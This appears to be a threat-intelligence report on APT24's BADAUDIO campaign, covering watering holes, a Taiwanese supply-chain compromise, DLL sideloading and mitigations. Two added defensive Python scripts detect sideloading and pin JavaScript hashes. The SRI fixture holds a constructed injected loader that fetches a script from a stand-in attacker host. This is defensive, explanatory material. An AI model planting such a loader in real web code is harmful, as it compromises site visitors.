Full Report
A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign. "While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting
Analysis Summary
# Threat Actor: APT24
## Attribution & Identity
* **Identification:** A China-nexus threat actor.
* **Known Aliases:** Pitty Tiger.
* **Associated Groups:** Assessed to be closely related to Earth Aughisky.
## Activity Summary
APT24 has been engaged in a nearly three-year espionage campaign, active since November 2022. Historically, the group relied on broad strategic web compromises (watering holes). Recently, they have pivoted to more sophisticated vectors, specifically targeting organizations in Taiwan. Key parts of this campaign include:
1. **Strategic Web Compromises (Nov 2022 - Sept 2025):** Compromised over 20 legitimate websites to inject malicious JavaScript that fingerprinted visitors' browsers (using FingerprintJS) and served selected targets a fake Chrome update prompt that delivered the BADAUDIO malware.
2. **Supply Chain Attacks (Starting July 2024):** Compromised a regional digital marketing firm in Taiwan and injected malicious JavaScript into a widely used library the firm distributes, affecting over 1,000 domains that load it.
## Tactics, Techniques & Procedures
* **Initial Access:** Strategic web compromises (watering holes), targeted spear-phishing, supply chain compromises (via compromised digital marketing firm's software libraries).
* **Execution & Persistence:** Using BADAUDIO malware to establish persistent remote access.
* **Specific TTPs:**
* Leveraging **DLL Search Order Hijacking** (MITRE ATT&CK T1574.001) for BADAUDIO execution via legitimate applications.
* Using encrypted archives containing BADAUDIO DLLs alongside VBS, BAT, and LNK files for execution chains.
* Malware designed to read proxy settings from `%systemroot%\system32\sprxx.dll` (shared characteristic with Earth Aughisky tools).
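The DLL search order hijacking chain above (a legitimate application loading a BADAUDIO DLL dropped beside it) leaves a recognisable trace in image-load telemetry: a DLL whose name normally resolves from System32 is instead loaded from the application's own directory, typically a user-writable one. The detection below is an added example, not tooling from the report; the Sysmon-style Event ID 7 records are constructed, and the list of hijack-prone DLL names is an assumed, illustrative subset rather than a complete baseline.

```python
"""Flag image-load telemetry consistent with DLL search-order hijacking (T1574.001).

Added example, not tooling from the report. SAMPLE_EVENTS are constructed
Sysmon-style Event ID 7 (ImageLoad) records, not real APT24 telemetry, and
SYSTEM_DLL_NAMES is an illustrative subset, not a complete baseline.
"""
import json
import ntpath
from typing import Optional, Tuple, List

# Directories a standard user can write to. A legitimate executable running from
# here next to a DLL that normally lives in System32 is the sideloading pattern.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Directories where the DLLs in SYSTEM_DLL_NAMES are expected to resolve.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Assumed baseline: DLL names commonly hijacked because applications load them
# by name and Windows searches the application directory before System32.
SYSTEM_DLL_NAMES = {
    "version.dll", "cryptbase.dll", "userenv.dll", "wtsapi32.dll",
    "dwmapi.dll", "profapi.dll", "uxtheme.dll",
}


def _is_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def _is_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def assess(event: dict) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a suspicious load, or None for benign."""
    image = event["Image"]
    loaded = event["ImageLoaded"]
    dll_name = ntpath.basename(loaded).lower()
    if dll_name not in SYSTEM_DLL_NAMES or _is_system_dir(loaded):
        return None  # not a hijack candidate, or loaded from where it belongs
    side_by_side = ntpath.dirname(image).lower() == ntpath.dirname(loaded).lower()
    if side_by_side and _is_user_writable(loaded):
        return ("high", f"{dll_name} loaded side-by-side from user-writable path {ntpath.dirname(loaded)}")
    if event.get("Signed", "").lower() == "false":
        return ("medium", f"unsigned {dll_name} loaded from non-system path {ntpath.dirname(loaded)}")
    return None


def scan(lines) -> List[dict]:
    """Run assess() over JSON lines; return one finding per flagged event."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        hit = assess(event)
        if hit:
            findings.append({"severity": hit[0], "reason": hit[1],
                             "image": event["Image"], "dll": event["ImageLoaded"]})
    return findings


# Constructed sample telemetry (not from the report): two benign loads, one
# side-by-side load from %TEMP%, one unsigned system-named DLL under Program Files.
SAMPLE_EVENTS = r"""
{"EventID": 7, "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Signed": "true"}
{"EventID": 7, "Image": "C:\\Program Files\\Vendor\\app.exe", "ImageLoaded": "C:\\Windows\\System32\\userenv.dll", "Signed": "true"}
{"EventID": 7, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update\\legit.exe", "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\update\\version.dll", "Signed": "false"}
{"EventID": 7, "Image": "C:\\Program Files\\Vendor\\app.exe", "ImageLoaded": "C:\\Program Files\\Vendor\\cryptbase.dll", "Signed": "false"}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(f"[{finding['severity']}] {finding['reason']}  ({finding['image']})")
```

The "high" rule (system-named DLL loaded side-by-side from a user-writable directory) is the one worth alerting on; the "medium" rule will also catch vendors that legitimately ship unsigned copies of such DLLs, so it is better used for triage than for paging.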
## Targeting
* **Sectors:** Government, healthcare, construction and engineering, mining, nonprofit, and telecommunications.
* **Geography:** U.S. and, more recently, Taiwan.
* **Victims:** Over 20 legitimate websites used as watering holes; a regional digital marketing firm in Taiwan compromised for supply chain attacks affecting over 1,000 domains.
## Tools & Infrastructure
* **Malware Families Used:**
* BADAUDIO (Previously undocumented, primary focus of the recent campaign).
* CT RAT
* MM RAT (Goldsun-B), a variant of Enfal/Lurid Downloader
* Gh0st RAT variants (Paladin RAT, Leo RAT)
* Taidoor (Roudan)
* **Infrastructure:** Command and Control (C2) servers contacted by BADAUDIO for payload delivery. BADAUDIO downloads, decrypts, and executes an AES-encrypted payload from a hard-coded C2 server (one observed payload was Cobalt Strike Beacon).
## Implications
APT24 demonstrates a multi-year commitment to espionage, transitioning from broad web compromises to tailored supply chain attacks against a specific geographic region (Taiwan), indicating persistent intelligence gathering objectives against sensitive sectors. The deployment of newly discovered, obfuscated malware (BADAUDIO) highlights their ongoing capability development.
## Mitigations
* Monitor for and investigate unusual execution chains involving DLL Search Order Hijacking (T1574.001).
* Implement stringent vetting and monitoring of third-party JavaScript libraries and software updates to prevent supply chain compromise exploitation.
* Analyze network traffic for C2 communication patterns indicative of BADAUDIO's staging/payload retrieval mechanism (initial system info exfiltration followed by AES-encrypted payload download).
* Review systems for the presence of known APT24 malware families (CT RAT, Taidoor, etc.).
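The supply chain vector above (malicious JavaScript injected into a library distributed by a third party and loaded by over 1,000 domains) is exactly the case that content-hash pinning addresses: a site that declares the hash of the library copy it reviewed will have the browser refuse a modified copy, and an operator that re-checks the hash will see precisely what changed. The script below is an added example, not code from the report or from any firm it describes; the library body, the injected loader line and the URLs are constructed.

```python
"""Pin third-party JavaScript by content hash and report what changed.

Added example, not code from the report or from the compromised firm. The library
body, its injected addition and the URLs are constructed for illustration.
"""
import base64
import difflib
import hashlib
from typing import Dict, List


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value ('<algo>-<base64 digest>') for the integrity attribute."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(url: str, content: bytes) -> str:
    """Emit a <script> tag pinned to the reviewed copy of the library."""
    return (f'<script src="{url}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def verify(pinned: Dict[str, str], fetched: Dict[str, bytes]) -> Dict[str, str]:
    """Compare each fetched library body to its pinned hash: 'ok', 'MODIFIED' or 'missing'."""
    results = {}
    for name, expected in pinned.items():
        body = fetched.get(name)
        if body is None:
            results[name] = "missing"
            continue
        algo = expected.split("-", 1)[0]
        results[name] = "ok" if sri_hash(body, algo) == expected else "MODIFIED"
    return results


def added_lines(reviewed: bytes, current: bytes) -> List[str]:
    """Lines present in the current copy but not in the reviewed one."""
    diff = difflib.unified_diff(
        reviewed.decode(errors="replace").splitlines(),
        current.decode(errors="replace").splitlines(),
        lineterm="", n=0,
    )
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


# Constructed: the library as reviewed, and the same library with an appended
# loader that pulls a second-stage script from an attacker-controlled host.
REVIEWED = (b"/*! analytics.js v2.4.1 */\n"
            b"function track(ev){navigator.sendBeacon('/collect',JSON.stringify(ev));}\n")
INJECTED = REVIEWED + (b"(function(){var s=document.createElement('script');"
                       b"s.src='https://cdn.example.invalid/fp.min.js';"
                       b"document.head.appendChild(s);})();\n")

# Manifest recorded when the library was reviewed.
PINNED = {"analytics.js": sri_hash(REVIEWED)}

if __name__ == "__main__":
    print(script_tag("https://marketing.example.invalid/analytics.js", REVIEWED))
    print(verify(PINNED, {"analytics.js": INJECTED}))
    for line in added_lines(REVIEWED, INJECTED):
        print("+", line)
```

Two caveats a practitioner will hit: SRI only protects assets included with an `integrity` attribute (a third-party tag that the vendor told you to paste without one gets no check), and it only works for static, versioned files, so a legitimate library update will block the script until the hash is re-reviewed and re-pinned. That blocking behaviour is the point: it turns a silent supply chain change into a visible one.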